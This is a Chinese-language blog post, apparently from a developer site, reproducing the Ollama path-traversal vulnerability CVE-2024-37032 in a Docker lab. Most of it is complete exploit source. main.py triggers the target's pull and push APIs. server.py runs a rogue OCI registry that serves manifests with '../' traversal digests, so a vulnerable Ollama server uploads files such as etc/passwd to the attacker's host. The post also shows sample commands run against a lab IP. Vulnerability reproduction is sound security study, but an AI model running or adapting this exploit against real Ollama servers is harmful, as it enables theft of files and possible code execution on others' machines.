CVE-2024-37032-Ollama漏洞

简介

Ollama是一个专为在本地环境中运行和定制大型语言模型而设计的工具。它提供了一个简单高效的接口,用于创建、运行和管理这些模型,同时还提供了一个丰富的预构建模型库,可以轻松集成到各种应用程序中。Ollama的目标是使大型语言模型的部署和交互变得简单,无论是对于开发者还是对于终端用户。

漏洞概述

漏洞编号:CVE-2024-37032 该漏洞允许通过路径遍历任意写入文件。digest字段的验证不正确,服务器错误地将有效负载解释为合法的文件路径,攻击者可在digest字段中包含路径遍历payload的恶意清单文件,利用该漏洞实现任意文件读取/写入或导致远程代码执行。

影响版本

Ollama < 0.1.34

环境搭建

在Docker中配置/etc/docker/daemon.json文件(若不存在则新建),添加镜像加速器,以便顺利拉取国外镜像

{

  "registry-mirrors": [

    "https://registry.docker-cn.com",

    "http://hub-mirror.c.163.com",

    "https://dockerhub.azk8s.cn",

    "https://mirror.ccs.tencentyun.com",

    "https://registry.cn-hangzhou.aliyuncs.com",

    "https://docker.mirrors.ustc.edu.cn",

    "https://docker.m.daocloud.io",   

    "https://noohub.ru",

    "https://huecker.io",

    "https://dockerhub.timeweb.cloud"

  ]

}

配置完成后,Docker镜像加速器即可正常使用

拉取docker镜像

docker run -v ollama:/root/.ollama -p 11434:11434 --name ollama ollama/ollama:0.1.33

发现版本存在漏洞

python3 main.py --file 'etc/hosts' --target 192.168.16.135 --namespace 'mem/test' --host 192.168.16.135

python3 main.py --file 'etc/passwd' --target 192.168.16.135 --namespace 'mem/test' --host 192.168.16.135

对比文件

main.py


import threading

from time import sleep

import requests

import uvicorn

import argparse

from server import create_app

import socket

# Seconds to wait for the rogue server to start and between exploit steps.
SLEEP_TIME = 0.5

def get_machine_ip():
    """Best-effort discovery of this machine's outbound IPv4 address.

    Opens a UDP socket "toward" a public DNS server (no packet is
    actually sent for UDP connect) and reads back the local address the
    OS would route from.  Falls back to loopback on any failure.

    Returns:
        str: Dotted-quad IPv4 address, e.g. ``"192.168.1.5"``.
    """
    probe = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        probe.connect(("8.8.8.8", 80))
        return probe.getsockname()[0]
    except Exception:
        return "127.0.0.1"
    finally:
        probe.close()

def run_server(file, host, namespace):
    """Launch the rogue-registry FastAPI app on port 80 (blocking call)."""
    rogue_app = create_app(file, host, namespace)
    uvicorn.run(rogue_app, host='0.0.0.0', port=80)

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Run FastAPI rogue server and exploit script (CVE-2024-37032).")
    parser.add_argument("--file", type=str, required=True, help="The file to read remotely.")
    parser.add_argument("--target", type=str, required=True, help="The vulnerable Ollama instance's (target) IP.")
    # NOTE: the original option was named "--target-ip" even though it
    # carries the target *port*; keep it as a hidden alias for backward
    # compatibility, and fix the type (was str with an int default).
    parser.add_argument("--target-port", "--target-ip", dest="target_ip", type=int, required=False,
                        default=11434, help="The vulnerable Ollama instance's (target) port.")
    parser.add_argument("--host", type=str, required=False, help="Current (attacker) machine's IP.")
    parser.add_argument("--namespace", type=str, required=False, default='vsociety/test', help="The string for the rogue registry namespace.")
    args = parser.parse_args()

    host = args.host or get_machine_ip()
    target_url = f"http://{args.target}:{args.target_ip}"
    # Digest payloads are joined relative to a "../" prefix, so the file
    # path must not start with a slash.
    file = args.file.lstrip("/")

    # Start the rogue registry in a background daemon thread so this
    # thread is free to drive the exploit requests.
    server_thread = threading.Thread(target=run_server, args=(file, host, args.namespace))
    server_thread.daemon = True
    server_thread.start()

    # Give the server a moment to start accepting connections.
    sleep(SLEEP_TIME)

    vuln_registry_url = f"{host}/{args.namespace}"
    pull_url = f"{target_url}/api/pull"
    push_url = f"{target_url}/api/push"

    # Pull phase: the traversal manifest makes Ollama write blobs to
    # attacker-chosen paths on the target.
    requests.post(pull_url, json={"name": vuln_registry_url, "insecure": True})
    sleep(SLEEP_TIME)
    # Push phase: Ollama uploads the traversal-referenced file back to us.
    requests.post(push_url, json={"name": vuln_registry_url, "insecure": True})

    # Keep the process alive while the server thread handles callbacks.
    server_thread.join()

server.py


from fastapi import FastAPI, Request, Response

# Number of "../" segments prepended to digest fields -- deep enough to
# escape Ollama's blob directory up to the filesystem root.
# NOTE(review): the name is misspelled ("TRAVELSAL") and describes a
# count, not a string; kept as-is in case it is referenced elsewhere.
PATH_TRAVELSAL_STRING = 14

# The actual path-traversal prefix, e.g. "../../../..." repeated 14 times.
PREFIX = "../" * PATH_TRAVELSAL_STRING

# Fixed upload-session UUID handed out by the fake registry's upload endpoints.
UUID = "3647298c-9588-4dd2-9bbe-0539533d2d04"

# Opaque URL-encoded `_state` token mimicking a real registry upload session.
STATE = "eBQ2_sxwOJVy8DZMYYZ8wA8NBrJjmdINFUMM6uEZyYF7Ik5hbWUiOiJyb2d1ZS9sbGFtYTMiLCJVVUlEIjoiMzY0NzI5OGMtOTU4OC00ZGQyLTliYmUtMDUzOTUzM2QyZDA0IiwiT2Zmc2V0IjowLCJTdGFydGVkQXQiOiIyMDI0LTA2LTI1VDEzOjAxOjExLjU5MTkyMzgxMVoifQ%3D%3D"

def create_app(file: str, host: str, namespace: str):
    """Build the rogue OCI-registry FastAPI app for CVE-2024-37032.

    The app mimics a Docker/OCI registry but serves manifests whose
    ``digest`` fields contain ``../`` path-traversal payloads.  A
    vulnerable Ollama (< 0.1.34) pulling from this registry interprets
    those digests as file paths; the subsequent push phase uploads the
    traversal-referenced target file back to us.

    Args:
        file: Path of the file to read on the target, relative (no
            leading slash), e.g. ``etc/passwd``.
        host: This (attacker) machine's IP as seen by the target.
        namespace: Registry namespace string, e.g. ``vsociety/test``.

    Returns:
        The configured FastAPI application.
    """
    app = FastAPI()

    def write_to_file(text):
        # Persist the exfiltrated file content locally for inspection.
        try:
            with open('response.txt', 'w') as file_to_write:
                file_to_write.write(text)
            print(f"Content of {file} successfully written to response.txt.")
        except IOError:
            # Fixed: was an f-string with no placeholders.
            print("Error: Could not write to response.txt.")

    @app.get("/")
    async def index_get():
        # Simple liveness endpoint.
        return {"message": "Hello!"}

    @app.post("/")
    async def index_post(callback_data: Request):
        return {"message": "Hello!"}

    # ---- PULL phase ---------------------------------------------------
    # Serve a manifest whose digests are path-traversal payloads.

    @app.get(f"/v2/{namespace}/manifests/latest")
    async def fake_manifests():
        return {
            "schemaVersion": 2,
            "mediaType": "application/vnd.docker.distribution.manifest.v2+json",
            "config": {
                "mediaType": "application/vnd.docker.container.image.v1+json",
                "digest": f"{PREFIX}{file}",
                "size": 10
            },
            "layers": [
                {
                    "mediaType": "application/vnd.ollama.image.license",
                    "digest": f"{PREFIX}tmp/notfoundfile",
                    "size": 10
                },
                {
                    "mediaType": "application/vnd.docker.distribution.manifest.v2+json",
                    "digest": f"{PREFIX}{file}",
                    "size": 10
                },
                {
                    # Plants a manifest under the target's own manifests
                    # directory so the later push phase re-reads it.
                    "mediaType": "application/vnd.ollama.image.license",
                    "digest": f"{PREFIX}root/.ollama/models/manifests/{host}/{namespace}/latest",
                    "size": 10
                }
            ]
        }

    # Blob endpoints: Ollama resolves the traversal digests back against
    # this server; echo the same traversal string in the digest headers.

    @app.head(f"/{file}")
    async def fake_head(response: Response):
        response.headers["Docker-Content-Digest"] = f"{PREFIX}{file}"
        return ''

    @app.get(f"/{file}", status_code=206)
    async def fake_get(response: Response):
        response.headers["Docker-Content-Digest"] = f"{PREFIX}{file}"
        response.headers["E-Tag"] = f"\"{PREFIX}{file}\""
        return 'test'

    @app.head(f"/root/.ollama/models/manifests/{host}/{namespace}/latest")
    async def fake_latest_head(response: Response):
        response.headers["Docker-Content-Digest"] = f"{PREFIX}root/.ollama/models/manifests/{host}/{namespace}/latest"
        return ''

    @app.get(f"/root/.ollama/models/manifests/{host}/{namespace}/latest", status_code=206)
    async def fake_latest_get(response: Response):
        # Same manifest as fake_manifests; this copy gets written into the
        # target's manifests directory via the traversal digest above.
        response.headers["Docker-Content-Digest"] = f"{PREFIX}root/.ollama/models/manifests/{host}/{namespace}/latest"
        response.headers["E-Tag"] = f"\"{PREFIX}root/.ollama/models/manifests/{host}/{namespace}/latest\""
        return {
            "schemaVersion": 2,
            "mediaType": "application/vnd.docker.distribution.manifest.v2+json",
            "config": {
                "mediaType": "application/vnd.docker.container.image.v1+json",
                "digest": f"{PREFIX}{file}",
                "size": 10
            },
            "layers": [
                {
                    "mediaType": "application/vnd.ollama.image.license",
                    "digest": f"{PREFIX}tmp/notfoundfile",
                    "size": 10
                },
                {
                    "mediaType": "application/vnd.docker.distribution.manifest.v2+json",
                    "digest": f"{PREFIX}{file}",
                    "size": 10
                },
                {
                    "mediaType": "application/vnd.ollama.image.license",
                    "digest": f"{PREFIX}root/.ollama/models/manifests/{host}/{namespace}/latest",
                    "size": 10
                }
            ]
        }

    @app.head("/tmp/notfoundfile")
    async def fake_notfound_head(response: Response):
        response.headers["Docker-Content-Digest"] = f"{PREFIX}tmp/notfoundfile"
        return ''

    @app.get("/tmp/notfoundfile", status_code=206)
    async def fake_notfound_get(response: Response):
        response.headers["Docker-Content-Digest"] = f"{PREFIX}tmp/notfoundfile"
        response.headers["E-Tag"] = f"\"{PREFIX}tmp/notfoundfile\""
        return ''

    # ---- PUSH phase ---------------------------------------------------
    # Ollama uploads blobs (including the stolen file) back to us.

    @app.post(f"/v2/{namespace}/blobs/uploads/", status_code=202)
    async def fake_upload_post(callback_data: Request, response: Response):
        # Hand out a fixed upload session so the client PATCHes us next.
        response.headers["Docker-Upload-Uuid"] = UUID
        response.headers["Location"] = f"http://{host}/v2/{namespace}/blobs/uploads/{UUID}?_state={STATE}"
        return ''

    @app.patch(f"/v2/{namespace}/blobs/uploads/{UUID}", status_code=202)
    async def fake_patch_file(callback_data: Request):
        # The PATCH body is the stolen file's content.  (Removed a dead
        # no-op replace("\n", "\n") from the original.)
        body = await callback_data.body()
        decoded_body = body.decode("utf-8")
        print(decoded_body)
        print("Writing response to file...")
        write_to_file(decoded_body)
        return ''

    @app.post(f"/v2/{namespace}/blobs/uploads/{UUID}", status_code=202)
    async def fake_post_file(callback_data: Request):
        return ''

    @app.put(f"/v2/{namespace}/manifests/latest")
    async def fake_manifests_put(callback_data: Request, response: Response):
        response.headers["Docker-Upload-Uuid"] = UUID
        response.headers["Location"] = f"http://{host}/v2/{namespace}/blobs/uploads/{UUID}?_state={STATE}"
        return ''

    return app

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值